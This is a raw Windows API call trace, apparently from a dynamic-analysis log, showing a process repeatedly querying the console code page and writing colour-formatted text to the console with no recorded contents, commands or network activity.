[0167.477] EtwEventActivityIdControl () returned 0x0 [0167.477] EtwEventActivityIdControl () returned 0x0 [0167.477] EtwEventActivityIdControl () returned 0x0 [0167.478] EtwEventActivityIdControl () returned 0x0 [0167.509] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e358 | out: lpConsoleScreenBufferInfo=0x5a0e358) returned 1 [0167.510] GetConsoleOutputCP () returned 0x1b5 [0167.510] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.510] GetConsoleOutputCP () returned 0x1b5 [0167.510] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.511] GetConsoleOutputCP () returned 0x1b5 [0167.511] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.511] GetConsoleOutputCP () returned 0x1b5 [0167.511] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.511] GetConsoleOutputCP () returned 0x1b5 [0167.511] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.511] GetConsoleOutputCP () returned 0x1b5 [0167.511] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.511] GetConsoleOutputCP () returned 0x1b5 [0167.512] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.512] GetConsoleOutputCP () returned 0x1b5 [0167.512] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.512] GetConsoleOutputCP () returned 0x1b5 [0167.512] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.512] GetConsoleOutputCP () returned 0x1b5 [0167.512] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.513] GetConsoleOutputCP () returned 0x1b5 [0167.513] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.513] GetConsoleOutputCP () returned 0x1b5 [0167.513] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.513] GetConsoleOutputCP () returned 0x1b5 [0167.513] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.513] GetConsoleOutputCP () returned 0x1b5 [0167.513] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.514] GetConsoleOutputCP () returned 0x1b5 [0167.514] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.514] GetConsoleOutputCP () returned 0x1b5 [0167.514] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.514] GetConsoleOutputCP () returned 0x1b5 [0167.514] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.514] GetConsoleOutputCP () returned 0x1b5 [0167.514] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.514] GetConsoleOutputCP () returned 0x1b5 [0167.515] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.515] GetConsoleOutputCP () returned 0x1b5 [0167.515] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.515] GetConsoleOutputCP () returned 0x1b5 [0167.515] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.515] GetConsoleOutputCP () returned 0x1b5 [0167.516] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.516] GetConsoleOutputCP () returned 0x1b5 [0167.516] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.516] GetConsoleOutputCP () returned 0x1b5 [0167.516] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.516] GetConsoleOutputCP () returned 0x1b5 [0167.516] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.516] GetConsoleOutputCP () returned 0x1b5 [0167.517] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.517] GetConsoleOutputCP () returned 0x1b5 [0167.517] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.517] GetConsoleOutputCP () returned 0x1b5 [0167.517] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.517] GetConsoleOutputCP () returned 0x1b5 [0167.517] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.517] GetConsoleOutputCP () returned 0x1b5 [0167.518] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.518] GetConsoleOutputCP () returned 0x1b5 [0167.518] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.518] GetConsoleOutputCP () returned 0x1b5 [0167.518] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.518] GetConsoleOutputCP () returned 0x1b5 [0167.518] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.518] GetConsoleOutputCP () returned 0x1b5 [0167.519] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.519] GetConsoleOutputCP () returned 0x1b5 [0167.519] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.519] GetConsoleOutputCP () returned 0x1b5 [0167.519] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.519] GetConsoleOutputCP () returned 0x1b5 [0167.519] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.519] GetConsoleOutputCP () returned 0x1b5 [0167.520] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.520] GetConsoleOutputCP () returned 0x1b5 [0167.520] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.520] GetConsoleOutputCP () returned 0x1b5 [0167.520] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.520] GetConsoleOutputCP () returned 0x1b5 [0167.521] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.521] GetConsoleOutputCP () returned 0x1b5 [0167.521] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.521] GetConsoleOutputCP () returned 0x1b5 [0167.521] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.521] GetConsoleOutputCP () returned 0x1b5 [0167.521] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.521] GetConsoleOutputCP () returned 0x1b5 [0167.522] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.522] GetConsoleOutputCP () returned 0x1b5 [0167.522] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.522] GetConsoleOutputCP () returned 0x1b5 [0167.522] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.522] GetConsoleOutputCP () returned 0x1b5 [0167.522] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.522] GetConsoleOutputCP () returned 0x1b5 [0167.523] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.523] GetConsoleOutputCP () returned 0x1b5 [0167.523] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.523] GetConsoleOutputCP () returned 0x1b5 [0167.523] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.523] GetConsoleOutputCP () returned 0x1b5 [0167.523] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.523] GetConsoleOutputCP () returned 0x1b5 [0167.523] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.524] GetConsoleOutputCP () returned 0x1b5 [0167.524] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.524] GetConsoleOutputCP () returned 0x1b5 [0167.524] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.524] GetConsoleOutputCP () returned 0x1b5 [0167.524] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.524] GetConsoleOutputCP () returned 0x1b5 [0167.524] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.525] GetConsoleOutputCP () returned 0x1b5 [0167.525] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.525] GetConsoleOutputCP () returned 0x1b5 [0167.525] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.525] GetConsoleOutputCP () returned 0x1b5 [0167.525] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.525] GetConsoleOutputCP () returned 0x1b5 [0167.525] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.526] GetConsoleOutputCP () returned 0x1b5 [0167.526] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5a0e1d0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5a0e1d0) returned 0 [0167.526] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e2b0 | out: lpConsoleScreenBufferInfo=0x5a0e2b0) returned 1 [0167.526] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.526] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.527] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.527] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.528] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.528] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.528] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e26c | out: lpMode=0x5a0e26c) returned 1 [0167.529] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x26b663c*, nNumberOfCharsToWrite=0x48, lpNumberOfCharsWritten=0x5a0e260, lpReserved=0x0 | out: lpBuffer=0x26b663c*, lpNumberOfCharsWritten=0x5a0e260*=0x48) returned 1 [0167.529] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.530] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.530] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.530] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.531] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e2ac | out: lpMode=0x5a0e2ac) returned 1 [0167.531] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x22e1700*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e2a0, lpReserved=0x0 | out: lpBuffer=0x22e1700*, lpNumberOfCharsWritten=0x5a0e2a0*=0x1) returned 1 [0167.531] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e2b0 | out: lpConsoleScreenBufferInfo=0x5a0e2b0) returned 1 [0167.532] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.532] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.532] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.533] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.533] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.533] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.534] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e26c | out: lpMode=0x5a0e26c) returned 1 [0167.534] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x26b69c0*, nNumberOfCharsToWrite=0x27, lpNumberOfCharsWritten=0x5a0e260, lpReserved=0x0 | out: lpBuffer=0x26b69c0*, lpNumberOfCharsWritten=0x5a0e260*=0x27) returned 1 [0167.534] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.535] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.535] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.535] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.536] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e2ac | out: lpMode=0x5a0e2ac) returned 1 [0167.536] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x22e1700*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e2a0, lpReserved=0x0 | out: lpBuffer=0x22e1700*, lpNumberOfCharsWritten=0x5a0e2a0*=0x1) returned 1 [0167.536] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e2b0 | out: lpConsoleScreenBufferInfo=0x5a0e2b0) returned 1 [0167.537] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.537] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.537] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.538] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.538] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.538] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.539] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e26c | out: lpMode=0x5a0e26c) returned 1 [0167.539] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x26b5d48*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x5a0e260, lpReserved=0x0 | out: lpBuffer=0x26b5d48*, lpNumberOfCharsWritten=0x5a0e260*=0x11) returned 1 [0167.540] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.540] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.540] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.541] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.541] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e2ac | out: lpMode=0x5a0e2ac) returned 1 [0167.541] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x22e1700*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e2a0, lpReserved=0x0 | out: lpBuffer=0x22e1700*, lpNumberOfCharsWritten=0x5a0e2a0*=0x1) returned 1 [0167.542] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e2b0 | out: lpConsoleScreenBufferInfo=0x5a0e2b0) returned 1 [0167.542] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.542] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.543] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.543] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.543] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.544] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.544] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e26c | out: lpMode=0x5a0e26c) returned 1 [0167.544] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x26b5d78*, nNumberOfCharsToWrite=0x1d, lpNumberOfCharsWritten=0x5a0e260, lpReserved=0x0 | out: lpBuffer=0x26b5d78*, lpNumberOfCharsWritten=0x5a0e260*=0x1d) returned 1 [0167.545] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.545] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.545] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.546] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.546] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e2ac | out: lpMode=0x5a0e2ac) returned 1 [0167.547] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x22e1700*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e2a0, lpReserved=0x0 | out: lpBuffer=0x22e1700*, lpNumberOfCharsWritten=0x5a0e2a0*=0x1) returned 1 [0167.547] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e2b0 | out: lpConsoleScreenBufferInfo=0x5a0e2b0) returned 1 [0167.547] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.548] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.548] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.548] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.549] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.549] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.549] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e26c | out: lpMode=0x5a0e26c) returned 1 [0167.550] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x26b5dc0*, nNumberOfCharsToWrite=0x1d, lpNumberOfCharsWritten=0x5a0e260, lpReserved=0x0 | out: lpBuffer=0x26b5dc0*, lpNumberOfCharsWritten=0x5a0e260*=0x1d) returned 1 [0167.550] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.550] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.551] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.551] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.551] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e2ac | out: lpMode=0x5a0e2ac) returned 1 [0167.552] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x22e1700*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5a0e2a0, lpReserved=0x0 | out: lpBuffer=0x22e1700*, lpNumberOfCharsWritten=0x5a0e2a0*=0x1) returned 1 [0167.552] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e2b0 | out: lpConsoleScreenBufferInfo=0x5a0e2b0) returned 1 [0167.552] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.554] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e248 | out: lpConsoleScreenBufferInfo=0x5a0e248) returned 1 [0167.554] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.555] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.555] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e250 | out: lpConsoleScreenBufferInfo=0x5a0e250) returned 1 [0167.555] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0xc) returned 1 [0167.555] GetConsoleMode (in: hConsoleHandle=0xf, lpMode=0x5a0e26c | out: lpMode=0x5a0e26c) returned 1 [0167.556] WriteConsoleW (in: hConsoleOutput=0xf, lpBuffer=0x26b70b0*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x5a0e260, lpReserved=0x0 | out: lpBuffer=0x26b70b0*, lpNumberOfCharsWritten=0x5a0e260*=0x4f) returned 1 [0167.556] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.556] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) returned 1 [0167.557] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x5a0e24c | out: lpConsoleScreenBufferInfo=0x5a0e24c) returned 1 [0167.557] SetConsoleTextAttribute (hConsoleOutput=0xf, wAttributes=0x7) 